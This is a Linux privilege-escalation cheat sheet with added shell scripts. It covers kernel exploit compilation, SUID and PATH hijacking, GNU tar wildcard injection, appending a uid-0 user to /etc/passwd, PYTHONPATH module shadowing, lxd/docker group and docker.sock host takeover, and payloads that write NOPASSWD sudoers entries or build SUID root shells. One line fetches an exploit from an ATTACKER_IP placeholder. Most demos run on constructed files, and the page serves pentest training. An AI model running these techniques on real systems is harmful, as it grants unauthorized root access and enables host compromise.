Linux Privesc

Privilege escalation means moving from a lower-privileged account or context to a higher-privileged one; on Linux the goal is normally root (uid 0), either directly or through an equivalent such as a sudoers entry, a root-owned SUID shell, or write access to /etc/passwd or /etc/shadow.

Enumeration Scripts:

Several scripts automate the enumeration needed to find an escalation path on a Linux host (kernel version, SUID files, sudo rules, cron jobs, writable paths, capabilities, and so on). Two examples follow:

Kernel Vulnerabilities

Kernel vulnerabilities can be exploited to escalate privileges when the target runs an unpatched kernel. linux-exploit-suggester.sh does the matching for us: it compares the running kernel version (and, where it can, the distribution) against a list of public exploits and prints the candidates. Kernel exploits can crash the target, so prefer the other techniques on this page when they are available and test the exploit on a matching kernel first.

Compiling Exploits

Sometimes we need to compile an exploit ourselves to obtain the binary. The target's architecture (uname -m) decides the flag, and building with -static avoids glibc mismatches between the attacking machine and the target.

For 64-bit targets:

For 32-bit targets:

Finally we just need to give the binary execution permissions.

eBPF_verifier - Linux Kernel < 4.13.9 (CVE-2017-16995; Ubuntu 16.04 / Fedora 27, needs unprivileged bpf() calls allowed)

DirtyC0w - Linux Kernel 2.6.22 < 3.9 (this is the exploit-db title; CVE-2016-5195 actually affects every kernel from 2.6.22 until the fix in 4.8.3 and the distribution backports of October 2016)

Transfer the exploit to the target machine.

Mempodipper - Linux Kernel 2.6.39 < 3.2.2 (CVE-2012-0056; Gentoo / Ubuntu x86/x64)
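The compile-and-transfer steps above as one script. This is an added example, not the page's own commands: it assumes gcc on the attacking machine, python3 to serve the file, and an attacker address written here as the placeholder ATTACKER_IP. The demo at the end compiles a constructed hello-world so it can be run without an exploit at hand.

```shell
#!/bin/sh
# Added example: build an exploit for the target's architecture, make it
# executable and stage it for transfer. Not taken from the original page.

# Map the target's `uname -m` to the gcc width flag. Other architectures
# (aarch64, armv7l, ...) get no flag: build natively on a matching box.
gcc_arch_flag() {
    case "$1" in
        x86_64|amd64) echo "-m64" ;;
        i?86|x86)     echo "-m32" ;;
        *)            echo "" ;;
    esac
}

# Compile SRC for ARCH into OUT and set the execute bit. Put -static in
# EXTRA_CFLAGS when the target's libc is older than ours; -w silences the
# warnings old exploit code tends to produce.
compile_exploit() {
    src="$1"; out="$2"; arch="$3"
    flag=$(gcc_arch_flag "$arch")
    # $flag and EXTRA_CFLAGS are unquoted on purpose so empty values vanish
    gcc $flag ${EXTRA_CFLAGS:-} -w -o "$out" "$src" || return 1
    chmod +x "$out"
}

# Serve DIR over HTTP from the attacking box. On the target (ATTACKER_IP is a
# placeholder):
#   wget http://ATTACKER_IP:8000/exploit -O /tmp/exploit && chmod +x /tmp/exploit
serve_dir() {
    dir="$1"; port="${2:-8000}"
    (cd "$dir" && python3 -m http.server "$port")
}

# Demo on a constructed source file; runs only when gcc is installed.
demo_compile() {
    tmp=$(mktemp -d)
    cat > "$tmp/hello.c" <<'EOF'
#include <stdio.h>
int main(void) { puts("compiled ok"); return 0; }
EOF
    compile_exploit "$tmp/hello.c" "$tmp/hello" "$(uname -m)" && "$tmp/hello"
}

if command -v gcc >/dev/null 2>&1; then
    demo_compile
fi
```

A 32-bit build on a 64-bit attacking machine needs the multilib packages (gcc-multilib on Debian/Ubuntu); without them -m32 fails at link time.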

Abusing SUID/GUID Files

Check for files with the SUID/SGID bit set. Such a file runs with the privileges of its owner (SUID) or its group (SGID) rather than those of the user who executes it. When the owner is root, any SUID binary that can be made to spawn a shell, read or write arbitrary files hands us root.

The bits are set on top of the normal rwx permissions: adding 4 to the owner digit sets SUID (Set User ID), adding 2 to the group digit sets SGID (Set Group ID), for example chmod 4755 file or chmod u+s file.

In ls -l output an s replaces the x of the owner triplet for SUID and of the group triplet for SGID: SUID: -rwsr-xr-x (rws r-x r-x), SGID: -rwxr-sr-x (rwx r-s r-x). A capital S means the bit is set but the corresponding execute bit is not.

SUID, SGID and Sticky Bit

Permission    On Files                                                       On Directories
SUID bit      User executes the file with the permissions of the file owner.  -
SGID bit      User executes the file with the permissions of the group owner. Files created in the directory get the directory's group as their group owner.
Sticky bit    -                                                              Users may delete only the files they own (e.g. /tmp).

Finding SUID / SGID binaries (find with -perm -4000 / -perm -2000; compare the list against a default install, unusual entries such as custom binaries, nmap, vim, find, bash or python are the interesting ones):
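An added enumeration helper (not from the page) for the find step above: it lists SUID/SGID files under a root, prints their ls -l line, and diffs the paths against a baseline file so that non-default entries stand out. The baseline format is one absolute path per line; the demo builds a throwaway directory with constructed files because no real SUID binaries are needed to see it work.

```shell
#!/bin/sh
# Added example: find SUID/SGID files and diff them against a baseline.

# Paths of regular files with the SUID (4000) or SGID (2000) bit under ROOT.
# -xdev stays on one filesystem (skips /proc, network mounts); unreadable
# directories are silently skipped.
list_special_paths() {
    find "${1:-/}" -xdev -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null
}

# Same list with mode, owner and group, which is what tells us whether the
# file runs as root (owner root + s in the owner triplet).
show_special_bits() {
    list_special_paths "$1" | while IFS= read -r f; do
        ls -ld "$f"
    done
}

# Paths found under ROOT that are not in BASELINE (one path per line).
# Use a baseline taken from a clean install of the same distribution.
new_since_baseline() {
    baseline="$1"; root="$2"
    list_special_paths "$root" | grep -vxFf "$baseline" || true
}

# Demo on constructed files: a owns SUID, b owns SGID, c is an ordinary file.
demo_special_bits() {
    work=$(mktemp -d)
    : > "$work/a"; : > "$work/b"; : > "$work/c"
    chmod 4755 "$work/a"
    chmod 2755 "$work/b"
    chmod 0755 "$work/c"
    printf '%s\n' "$work/a" > "$work/baseline"
    echo "special bits under $work:"
    show_special_bits "$work"
    echo "not in baseline:"
    new_since_baseline "$work/baseline" "$work"
}

demo_special_bits
```

On a real host run show_special_bits / and keep the output; the usual suspects (passwd, sudo, su, mount, umount, ping, chsh, newgrp, pkexec) are expected, anything else deserves a look on GTFOBins.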

Exploiting PATH Variable

PATH is an environment variable on Linux and other Unix-like systems that lists the directories searched for executable programs. When a user types a command without a path, the shell (and any program that runs commands by bare name through the shell or execvp) walks the PATH directories in order and runs the first match.

How does this let us escalate privileges?

Suppose we find an SUID binary and, by running it (or by looking at it with strings or ltrace), we see that it calls the system shell to run a command by bare name, for example ps to list processes. A setuid program inherits our PATH, so we can prepend a directory we control; when the binary asks the shell for ps, the shell finds ours first and runs it with the binary's privileges. So first we change the PATH variable:

Then we create an executable file with the same name as the called binary in that directory. For a root shell it must run a shell that keeps the effective uid, such as /bin/bash -p, because bash silently drops euid back to our uid otherwise (copying bash and setting the SUID bit on the copy also works):

Finally, when the SUID binary calls ps, our file runs with the binary's privileges instead of listing the system processes.

Writeable Folders

We can sometimes elevate our privileges when we have write permission on specific directories.

Note: write permission on a directory lets us create, delete and rename entries in it, not change the content of an existing file. That is enough in practice: a file we cannot write to can be deleted and recreated under the same name, which replaces it with our content.

On PATH variable

If we can write to a directory such as /usr/local/bin or /usr/bin that appears in the PATH of a privileged process, we can escalate by placing a binary there: either a new name that a root script calls, or, for a directory that comes earlier in that PATH, a replacement for a command the process runs by bare name. What matters is the PATH of the root process (cron, a login service, a script), not ours; sudo in particular resets PATH to its secure_path, so the writable directory must be in that list.

SSH port open

When a user logs in over SSH, on some systems root runs the run-parts binary (for instance to build the message of the day) without an absolute path, so a malicious binary of that name placed in a writable directory earlier in root's PATH is executed as root at the next login. See Executing files with root below for payloads that fit.
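One script for both situations above, the PATH hijack of an SUID binary and the writable directory in a privileged PATH. It is an added example, not the page's code: writable_path_dirs reports the directories of a given PATH string we can write to, and hijack_demo builds a constructed stand-in for the SUID binary (a plain script that runs ps by bare name), plants a fake ps, and runs the victim with our PATH. Nothing here runs as root; in a real case the victim would be a root-owned 4755 binary and the fake ps would spawn /bin/bash -p instead of writing a marker.

```shell
#!/bin/sh
# Added example: PATH hijacking. Not from the original page.

# Print each writable directory in the colon-separated PATH given as $1.
# Empty entries and "." are also reported: both make the shell search the
# current working directory, which is just as good as a writable directory.
writable_path_dirs() {
    path="$1"
    old_ifs=$IFS; IFS=:
    for d in $path; do
        case "$d" in
            ""|.) echo "(current directory via empty or . entry)" ;;
            *)    [ -d "$d" ] && [ -w "$d" ] && echo "$d" ;;
        esac
    done
    IFS=$old_ifs
    return 0
}

# Constructed scenario: VICTIM stands in for an SUID binary that does
# system("ps"). Our fake ps is dropped into a directory we prepend to PATH.
hijack_demo() {
    work=$(mktemp -d)
    mkdir "$work/bin"
    # stand-in victim (would be root-owned, mode 4755 in the real case)
    printf '#!/bin/sh\nps\n' > "$work/victim"
    chmod +x "$work/victim"
    # malicious ps: writes a marker here; a real payload would be
    #   /bin/bash -p        (or: cp /bin/bash /tmp/rb; chmod 4755 /tmp/rb)
    printf '#!/bin/sh\necho hijacked > "%s/marker"\n' "$work" > "$work/bin/ps"
    chmod +x "$work/bin/ps"
    # the victim inherits our PATH and resolves ps through it
    PATH="$work/bin:$PATH" "$work/victim"
    cat "$work/marker"
}

echo "writable PATH dirs right now:"
writable_path_dirs "$PATH"
echo "hijack demo result: $(hijack_demo)"
```

Before relying on this against sudo, check secure_path in sudo -l output: sudo replaces PATH with it, so only a writable directory inside secure_path helps there. Cron jobs and login hooks use the PATH set in the crontab or by the service.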

Abusing Wildcards (*)

Tar Argument Injection in root cronjob

Imagine you compromise a low-privileged user and find that a command like the following runs as root (a cron job that archives a directory with tar and a wildcard: tar ... *):

Being lazy, the payload we want is a sudoers entry so that afterwards we can just run sudo bash; so let's see how. GNU tar treats arguments that start with -- as options, and the wildcard expands to whatever file names exist in the directory, so creating files named --checkpoint=1 and --checkpoint-action=exec=sh shell.sh in that directory turns them into tar options and runs shell.sh as root:
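The tar argument injection above as a script that plants the payload files and simulates the root cron job locally. This is an added example, not the page's own; because it does not run as root the demo payload writes a marker file, and the sudoers line a real payload would append is shown in a comment. It assumes GNU tar (the --checkpoint-action option is GNU-specific) and a job of the form cd DIR && tar -cf ARCHIVE *.

```shell
#!/bin/sh
# Added example: GNU tar wildcard injection. Not from the original page.

# Create the three files the wildcard will expand into tar arguments.
# "--checkpoint=1" makes tar act at the first record; "--checkpoint-action=
# exec=..." runs the command with the privileges of the tar process (root
# when the cron job is root's).
plant_tar_payload() {
    dir="$1"; payload="$2"
    printf '#!/bin/sh\n%s\n' "$payload" > "$dir/shell.sh"
    chmod +x "$dir/shell.sh"
    : > "$dir/--checkpoint=1"
    : > "$dir/--checkpoint-action=exec=sh shell.sh"
}

# Stand-in for the cron job: same cwd, same glob. The glob is expanded by the
# subshell after the cd, exactly as in a crontab command line.
simulate_cronjob() {
    dir="$1"; archive="$2"
    (cd "$dir" && tar -cf "$archive" *) >/dev/null 2>&1 || true
}

tar_wildcard_demo() {
    work=$(mktemp -d)
    : > "$work/data.txt"        # something for the job to back up
    # Real payload (run as root by tar):
    #   echo 'lowpriv ALL=(ALL) NOPASSWD:ALL' >> /etc/sudoers
    # Here: write a marker in the backed-up directory instead.
    plant_tar_payload "$work" "echo pwned > marker"
    simulate_cronjob "$work" "$work.tar"
    cat "$work/marker" 2>/dev/null || echo "no marker (not GNU tar?)"
}

echo "tar wildcard demo: $(tar_wildcard_demo)"
```

File names containing spaces or = are legal, which is why the payload file can carry the whole option; the shell.sh name is a plain file so the glob also passes it as an ordinary member to archive. Other wildcard-driven tools have equivalents (rsync -e, chown --reference, zip -T --unzip-command).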

Writeable /etc/passwd

The /etc/passwd file stores the account information required at login: one line per user with name, password field, uid, gid, description, home directory and shell. The password field normally holds an x, meaning the hash lives in /etc/shadow, but a hash written directly into /etc/passwd is still honoured.

If /etc/passwd is writable we can append a new line with uid 0 and a password of our choice, which gives us a second root account. First we need a password hash in crypt(3) format (for example with openssl passwd -1 or openssl passwd -6).

Then append a line of the form name:HASH:0:0:root:/root:/bin/bash to /etc/passwd:

And finally su to the new user with the chosen password to obtain a root shell:
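The hash-and-append step as a script. This is an added example rather than the page's commands; it assumes openssl (or, as a fallback, perl's crypt(), which calls the system crypt(3)) is present, and it takes the passwd file as a parameter so it can be practised on a copy. The salt is fixed only so the demo output is reproducible.

```shell
#!/bin/sh
# Added example: add a uid-0 user to a writable passwd file. Not from the page.

# MD5-crypt ($1$) hash of PASSWORD with SALT. Prefer openssl; fall back to perl.
# $6$ (SHA-512) hashes also work on any modern system: openssl passwd -6.
passwd_hash() {
    password="$1"; salt="${2:-xyz}"
    if command -v openssl >/dev/null 2>&1; then
        openssl passwd -1 -salt "$salt" "$password"
    elif command -v perl >/dev/null 2>&1; then
        perl -e 'print crypt($ARGV[0], "\$1\$" . $ARGV[1] . "\$"), "\n"' "$password" "$salt"
    else
        echo "no hashing tool available" >&2
        return 1
    fi
}

# The seven-field line: name:hash:uid:gid:gecos:home:shell.
# uid 0 is what makes the account root; the name is irrelevant.
passwd_line() {
    name="$1"; hash="$2"
    printf '%s:%s:0:0:root:/root:/bin/bash\n' "$name" "$hash"
}

# Append the new root-equivalent user to FILE if we can write it.
# Afterwards: su NAME  (enter PASSWORD)  ->  root shell.
add_root_user() {
    file="$1"; name="$2"; password="$3"
    [ -w "$file" ] || { echo "$file is not writable" >&2; return 1; }
    hash=$(passwd_hash "$password") || return 1
    passwd_line "$name" "$hash" >> "$file"
}

# How many uid-0 accounts a passwd file has (defenders: more than one is a flag).
uid0_count() {
    awk -F: '$3 == 0 { n++ } END { print n + 0 }' "$1"
}

# Demo on a constructed copy, never on the real file.
demo_passwd() {
    work=$(mktemp -d)
    printf 'root:x:0:0:root:/root:/bin/bash\nlow:x:1000:1000::/home/low:/bin/sh\n' > "$work/passwd"
    add_root_user "$work/passwd" rootme 'Passw0rd' && tail -n1 "$work/passwd"
    echo "uid-0 accounts: $(uid0_count "$work/passwd")"
}

demo_passwd
```

The same idea applies to a writable /etc/shadow (replace root's hash) and to a writable /etc/sudoers or /etc/sudoers.d/ entry; all three are also the first places to check for tampering when investigating a compromised host.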

GTFOBins

GTFOBins (https://gtfobins.github.io) is a curated list of Unix binaries that can be abused to bypass local security restrictions: spawn a shell, read or write files, or escape a restricted environment when run through sudo, with SUID set, or with capabilities.

First we check which binaries our user may run with sudo, and with which options (NOPASSWD, SETENV, the runas user):

Then we search GTFOBins for each allowed binary to see how to escape from it and obtain a shell:
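An added helper (not part of the page) for the two steps above: it parses sudo -l output into runas user, tags (NOPASSWD, SETENV, ...) and binary, and prints the GTFOBins page to check for each binary. The sudo -l text below is constructed for the demo; on a real host pipe in the real output.

```shell
#!/bin/sh
# Added example: sudo -l output -> binaries -> GTFOBins pages. Not from the page.

# Constructed sudo -l output for the demo (user "low" on host "box").
SAMPLE_SUDO_L='Matching Defaults entries for low on box:
    env_reset, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User low may run the following commands on box:
    (root) NOPASSWD: /usr/bin/vim
    (ALL : ALL) /usr/bin/find, /usr/bin/less
    (root) SETENV: /usr/bin/python3 /opt/app/run.py'

# One "runas|tags|binary" line per allowed command. Handles several comma-
# separated commands per line and keeps only the first word (the binary).
sudo_l_binaries() {
    printf '%s\n' "$1" | awk '
        /^[ \t]*\(/ {
            line = $0; sub(/^[ \t]*/, "", line)
            match(line, /^\([^)]*\)/)
            runas = substr(line, 2, RLENGTH - 2)
            rest = substr(line, RLENGTH + 1); sub(/^[ \t]*/, "", rest)
            tags = ""
            while (match(rest, /^[A-Z_]+:/)) {            # NOPASSWD:, SETENV:, ...
                tags = (tags == "" ? "" : tags ",") substr(rest, 1, RLENGTH - 1)
                rest = substr(rest, RLENGTH + 1); sub(/^[ \t]*/, "", rest)
            }
            n = split(rest, cmds, /,[ \t]*/)
            for (i = 1; i <= n; i++) {
                split(cmds[i], parts, " ")
                printf "%s|%s|%s\n", runas, (tags == "" ? "-" : tags), parts[1]
            }
        }'
}

# GTFOBins pages are keyed by the binary name: vim -> .../gtfobins/vim/
gtfobins_urls() {
    sudo_l_binaries "$1" | awk -F'|' '{
        n = split($3, p, "/"); name = p[n]
        printf "%s https://gtfobins.github.io/gtfobins/%s/\n", name, name
    }' | sort -u
}

sudo_l_binaries "$SAMPLE_SUDO_L"
gtfobins_urls "$SAMPLE_SUDO_L"
```

Two things to read off the parsed lines: a trailing argument (as with python3 above) means sudo only allows that exact command line, so the escape has to come from the environment (see SETENV) or from what the script itself does; and (ALL : ALL) with a password still requires our own password, not root's.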

SETENV permission

The SETENV tag on a sudo rule means we may set environment variables for the command; sudo then keeps variables it would normally strip, including PYTHONPATH when the allowed command is a Python script.

Look at the script for a module it imports, create a module of that name in a directory we control (for example /tmp) with our payload in it, and run the script through sudo with PYTHONPATH pointing at that directory: Python searches PYTHONPATH before the standard library, so our file is imported instead, as root. The original write-up used a file called sys.py; note that built-in modules such as sys are compiled into the interpreter and are not shadowed this way, so pick an import that exists as a .py file (shutil, random, json, or any third-party module the script uses).

We create the shadow module in /tmp, for example a file named after that import that runs our commands at import time.

Finally we open the backdoor by running the permitted command with PYTHONPATH=/tmp in front of it.
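The PYTHONPATH shadowing above, demonstrated locally. This is an added example, not the page's: it writes a constructed victim script that imports shutil, plants a shutil.py whose import writes a marker (a real payload would call os.setuid(0) and spawn a shell), and runs the victim with PYTHONPATH set. It also includes a check for whether a given module can be shadowed at all, which is what settles the sys.py question. Assumes python3; with a real SETENV rule the invocation becomes sudo PYTHONPATH=/tmp/pp /usr/bin/python3 /opt/app/run.py.

```shell
#!/bin/sh
# Added example: PYTHONPATH module shadowing. Not from the original page.

# Constructed victim: the kind of script a sudo rule might allow.
setup_victim() {
    cat > "$1/run.py" <<'EOF'
import shutil   # stdlib module that lives as a .py file: shadowable via PYTHONPATH
print("root fs has data:", shutil.disk_usage("/").total > 0)
EOF
}

# Shadow module. A real payload would be:
#   import os; os.setuid(0); os.system("/bin/bash")
plant_shadow_module() {
    dir="$1"; marker="$2"
    mkdir -p "$dir"
    cat > "$dir/shutil.py" <<EOF
open("$marker", "w").write("shadowed")
EOF
}

# Exit 0 if MODULE resolves to a .py file (can be shadowed), 1 if it is
# built-in or frozen into the interpreter (sys, builtins, os on 3.11+ ...).
shadowable() {
    python3 - "$1" <<'EOF'
import importlib.util, sys
spec = importlib.util.find_spec(sys.argv[1])
origin = spec.origin if spec else None
sys.exit(0 if origin and origin.endswith(".py") else 1)
EOF
}

pythonpath_demo() {
    work=$(mktemp -d)
    setup_victim "$work"
    plant_shadow_module "$work/pp" "$work/marker"
    # PYTHONPATH entries come before the standard library in sys.path
    PYTHONPATH="$work/pp" python3 "$work/run.py" >/dev/null 2>&1 || true
    cat "$work/marker" 2>/dev/null || echo "not shadowed"
}

if command -v python3 >/dev/null 2>&1; then
    echo "demo: $(pythonpath_demo)"
    for m in shutil sys; do
        if shadowable "$m"; then echo "$m: shadowable"; else echo "$m: built-in/frozen"; fi
    done
fi
```

The victim crashes after the import because our shutil has no disk_usage; that does not matter since the payload already ran. A payload that wants to stay quiet re-exports the real module (importlib can load it from the stdlib path) after doing its work.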

Snap install

When sudo -l shows that we may run snap install as root, we can install any package, including one we crafted ourselves: the install hook of a snap runs as root during installation.

Create your first snap following the snapcraft documentation, which is also useful for installing the build requirements.
The snap used by the dirty_sock exploit is a ready-made example: its install hook adds a user with sudo rights, and it is installed with the --dangerous --devmode flags so that an unsigned, unconfined hook is accepted.

We need to put our payload in the snap/hooks/install script (it runs as root) and adjust snap/snapcraft.yaml accordingly before building.

Linux Capabilities

Linux capabilities give a process a subset of root's privileges. They break the root privilege into smaller, distinct units, each of which can be granted independently to a process or stored on an executable's file attributes. This reduces the full privilege set a program needs and so lowers the impact of exploiting it; for us, a capability set on a binary can be the way up.

The capabilities(7) man page (man 7 capabilities) describes what each capability allows.

Note: in getcap output such as /usr/bin/python3 = cap_setuid+ep, the +ep suffix is not a capability. The letters are flags: e means Effective and p Permitted (i would be Inheritable). The capability that matters is the name before it; cap_setuid lets the program call setuid(0), cap_dac_override bypasses file permission checks (read and write any file), cap_dac_read_search reads any file, and cap_sys_admin is effectively root.

More info in:

Exploiting Crontab

The cron daemon is a long-running process that executes commands at specific dates and times. It is used to schedule activities, either one-off or recurring, and its jobs run with the privileges of the user named in the job, very often root.

To see which system jobs exist, read /etc/crontab and the files in /etc/cron.d/, and list /etc/cron.hourly, cron.daily, cron.weekly and cron.monthly (run through run-parts); per-user crontabs live in /var/spool/cron/crontabs/ and our own is shown by crontab -l:

If a script is scheduled to run as root and we can write to it (or to its directory, or it calls a command by relative name we can plant in its PATH), we modify it so that the job gives us a reverse shell or another payload from Executing files with root when cron next runs it.

Abusing privileges (Group memberships)

sudo

That's it: a member of the sudo group (wheel on some distributions) who knows their own password is already root, with sudo su or sudo -i:

lxd

A member of the local "lxd" group can escalate to root on the host immediately. This does not depend on sudo rights and asks for no password: the LXD daemon runs as root and the group grants full control over it, so a privileged container with the host filesystem mounted inside is root over the host. It is a design property rather than a bug, and it applies to the LXD snap package as well.

With Internet

Without Internet

Without Internet access, build an Alpine image on the attacking machine (for example with the lxd alpine-builder), transfer it to the target, import it, and start a container from it with security.privileged=true and the host's / added as a disk device; root inside the container then reads and writes the host filesystem as root.

Alternatively, when the target has Internet access, the image can be pulled straight from the ubuntu: remote:

adm

All members of the adm group can read the log files under /var/log (auth.log, syslog, web server logs), which often leak credentials, session tokens or the paths of scripts worth abusing:

disk

All members of the disk group have raw access to the block devices (/dev/sda*), which bypasses filesystem permissions entirely: with debugfs on the device the whole filesystem can be browsed and any file read, /etc/shadow included.

We can also write to the filesystem through the same raw access.

Hint: files owned by root, such as /etc/passwd or /etc/shadow, become writable this way; writing through the raw device underneath a mounted filesystem is risky, so prefer reading hashes and keys where that is enough.

video

The video group can read the framebuffer device (/dev/fb0), i.e. the current contents of the physical screen, whatever session is displayed on it. With the w command we can see who is logged on to the server:

So we need to grab the raw framebuffer data and its geometry (the width and height in /sys/class/graphics/fb0/virtual_size):

Finally we can open the dump with GIMP as raw image data, entering those dimensions, and look at what the logged-in user sees.

docker

As members of the docker group we can talk to the Docker daemon, which runs as root, and start a container with the host's root filesystem mounted as a volume; a chroot into that mount is a root shell on the host.

We can also share the host's network namespace with the container (--network host), for example to reach services bound to localhost.
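The lxd and docker group escapes above as one script, added here and not taken from the page. Both follow the same pattern: a privileged container with / of the host mounted inside it. Every command goes through run, which only prints the command while DRY_RUN=1 (the default), so the sequence can be reviewed, and executes it with DRY_RUN=0 on a host where we are in one of those groups. The image file, alias and container names are placeholders.

```shell
#!/bin/sh
# Added example: lxd / docker group to host root. Not from the original page.

DRY_RUN="${DRY_RUN:-1}"

# Print the command in dry-run mode, execute it otherwise.
run() {
    if [ "$DRY_RUN" = 1 ]; then
        printf '%s\n' "$*"
    else
        "$@"
    fi
}

# lxd group: import an image we brought along (an Alpine tarball built on the
# attacking box), create a privileged container, mount the host root into it.
lxd_escape() {
    image="${1:-alpine.tar.gz}"
    run lxd init --auto
    run lxc image import "$image" --alias privesc
    run lxc init privesc pe -c security.privileged=true
    run lxc config device add pe host-root disk source=/ path=/mnt/root recursive=true
    run lxc start pe
    run lxc exec pe -- /bin/sh
    # inside the container: chroot /mnt/root, or edit /mnt/root/etc/sudoers,
    # or cp /mnt/root/bin/bash /mnt/root/tmp/rb && chmod 4755 /mnt/root/tmp/rb
}

# docker group: no image to build, the daemon pulls one; / becomes /mnt in the
# container and --network host shares the host network namespace as well.
docker_escape() {
    image="${1:-alpine}"
    run docker run --rm -it -v /:/mnt --network host "$image" chroot /mnt /bin/sh
}

echo "# lxd"
lxd_escape alpine.tar.gz
echo "# docker"
docker_escape alpine
```

On a host without Internet, an alternative to importing a tarball is that the image may already exist locally (lxc image list / docker images); any existing image will do since the escape comes from the privileged flag and the mount, not from the image contents.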

Docker Breakout

Privileged Flag enabled

A container started with the --privileged flag has all capabilities and access to the host's devices, which is enough to mount the host's disks from inside the container.

Once we are root inside such a container, we look for the host's disk (for example with fdisk -l or by listing /dev/sd*):

After finding the host partition (sda1 or similar) we mount it:

Finally, we just cd to our new mount point to reach all the host's files.

Docker.sock available

By default the docker command talks to the daemon through a UNIX socket at /var/run/docker.sock rather than over the network. Many setups and guides nevertheless mount this socket into a container as a volume, or expose the API on a TCP port. Anyone who can write to the socket controls the daemon, which runs as root, so a container with access to /var/run/docker.sock, locally or remotely, can take over the whole host (start a privileged container, mount /, exec into other containers).

Check if the socket is available:

List all containers:

Create an exec (a command to run in one of the containers):

Start the exec:
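The four API steps above as shell functions built on curl's --unix-socket support. This is an added example, not the page's own commands. It assumes the Docker Engine API shapes documented for GET /containers/json, POST /containers/{id}/exec and POST /exec/{id}/start; the socket path and container id are parameters, and the JSON parser is exercised on a constructed daemon reply so the helpers can be checked without a daemon.

```shell
#!/bin/sh
# Added example: Docker Engine API over docker.sock with curl. Not from the page.

SOCK="${DOCKER_SOCK:-/var/run/docker.sock}"

# A socket we can connect to and write to.
sock_available() {
    [ -S "$1" ] && [ -w "$1" ]
}

# Reduce the /containers/json reply to "id name image" lines. The reply is a
# JSON array of objects whose first fields are Id, Names, Image, so splitting on
# "}" and taking the first chunk per object is enough here.
parse_container_list() {
    tr -d '\n' | awk 'BEGIN { RS = "}" }
        /"Id":"/ {
            id = $0;   sub(/.*"Id":"/, "", id);       sub(/".*/, "", id)
            name = $0; sub(/.*"Names":\["/, "", name); sub(/".*/, "", name)
            img = $0;  sub(/.*"Image":"/, "", img);   sub(/".*/, "", img)
            print id, name, img
        }'
}

list_containers() {
    curl -s --unix-socket "$1" http://localhost/containers/json | parse_container_list
}

# Body for POST /containers/{id}/exec: run CMD through /bin/sh with output attached.
# CMD must not contain double quotes (no JSON escaping is done here).
exec_body() {
    printf '{"AttachStdin":false,"AttachStdout":true,"AttachStderr":true,"Tty":false,"Cmd":["/bin/sh","-c","%s"]}' "$1"
}

# Create the exec instance and print its Id.
create_exec() {
    sock="$1"; cid="$2"; cmd="$3"
    curl -s --unix-socket "$sock" -H 'Content-Type: application/json' \
        -d "$(exec_body "$cmd")" "http://localhost/containers/$cid/exec" |
        sed -n 's/.*"Id":"\([0-9a-f]*\)".*/\1/p'
}

# Start it; the reply carries the command output as a multiplexed stream
# (an 8-byte header before each chunk, readable enough for a quick look).
start_exec() {
    sock="$1"; eid="$2"
    curl -s --unix-socket "$sock" -H 'Content-Type: application/json' \
        -d '{"Detach":false,"Tty":false}' "http://localhost/exec/$eid/start"
}

# Beyond exec: POST /containers/create with
#   {"Image":"alpine","Cmd":["chroot","/mnt","sh"],"HostConfig":{"Binds":["/:/mnt"]}}
# followed by /containers/{id}/start gives a container holding the host root.

if sock_available "$SOCK"; then
    list_containers "$SOCK"
else
    echo "no usable docker socket at $SOCK"
fi
```

Usage on a host where the socket is exposed: id=$(list_containers "$SOCK" | head -n1 | cut -d' ' -f1); eid=$(create_exec "$SOCK" "$id" id); start_exec "$SOCK" "$eid". If the API is on TCP instead, replace --unix-socket "$SOCK" http://localhost with the host:port.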

USBCreator D-Bus

A vulnerability in the USBCreator D-Bus interface allowed a user in the sudo group to bypass the password check that sudo imposes: the D-Bus service ran as root and let the caller overwrite arbitrary files with arbitrary content, as root, without supplying a password.

Executing files with root

Adding a new SUDOER user (Bash)

Whenever we obtain command execution as root (cron, wildcard injection, a writable PATH directory), one option is to create a new user and grant it passwordless sudo through the sudoers file or a file in /etc/sudoers.d/:

Creating a SUID shell (bash)

We can copy the bash binary to /tmp and set the SUID bit on the copy; running it with -p keeps the effective uid 0 (note that a /tmp mounted nosuid ignores the bit, so use another writable directory in that case).

Creating a SUID shell (C)

We can write a small C program that sets both the real and effective uid to 0 and executes a shell:

We compile it and give it SUID permissions. Ownership and mode bits do not survive a plain transfer (wget, nc, scp as our user), and the SUID bit only grants the owner's privileges, so on the target the file must be owned by root with mode 4755.

Finally we use the root-level command execution on the target to put it in place: either compile it there, or transfer the binary and have the command execution run chown root and chmod 4755 on it.
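The three payloads of this section as a script, added here rather than quoted from the page. add_sudoer_user and the chown/chmod steps need to run as root (that is the point: they are what the root-level command execution should run); the C source is written from a heredoc so the whole thing can be shipped as one file. User names and paths are placeholders, and the demo only verifies the SUID bit on a non-root copy, since without root the resulting shell is not privileged.

```shell
#!/bin/sh
# Added example: payloads to run with root command execution. Not from the page.

# 1. New sudoer (run as root): user plus a NOPASSWD rule in /etc/sudoers.d.
add_sudoer_user() {
    user="$1"; pass="$2"
    useradd -m -s /bin/bash "$user" || return 1
    printf '%s:%s\n' "$user" "$pass" | chpasswd
    echo "$user ALL=(ALL) NOPASSWD:ALL" > "/etc/sudoers.d/$user"
    chmod 440 "/etc/sudoers.d/$user"
}

# 2. SUID copy of bash (run as root so the copy is root-owned). Use it with
#    /tmp/rootbash -p ; without -p bash drops the effective uid.
make_suid_bash() {
    dst="${1:-/tmp/rootbash}"
    cp /bin/bash "$dst" && chmod 4755 "$dst"
}

# 3. SUID wrapper in C. Setting the real uid to 0 as well means any shell it
#    spawns keeps root without -p. setgid/setuid fail with EPERM when the
#    binary is not SUID root, so the wrapper reports that instead of a
#    silently unprivileged shell.
write_suid_wrapper_src() {
    cat > "$1" <<'EOF'
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(void) {
    if (setgid(0) != 0 || setuid(0) != 0) {
        perror("setgid/setuid");   /* not running as SUID root */
        return 1;
    }
    execl("/bin/sh", "sh", (char *)NULL);
    perror("execl");
    return 1;
}
EOF
}

# Compile and set mode 4755; as root add: chown root:root "$out"
compile_suid_wrapper() {
    src="$1"; out="$2"
    gcc -o "$out" "$src" && chmod 4755 "$out"
}

# Owner permission triplet from ls -l: "rws" shows the SUID bit is set.
owner_perm_bits() {
    ls -l "$1" | cut -c2-4
}

# Demo without root: build the wrapper, check the bit, run it (it reports EPERM).
demo_wrapper() {
    work=$(mktemp -d)
    write_suid_wrapper_src "$work/w.c"
    compile_suid_wrapper "$work/w.c" "$work/w" || return 1
    echo "owner bits: $(owner_perm_bits "$work/w")"
    "$work/w" </dev/null || echo "wrapper exited $? (expected when not root)"
}

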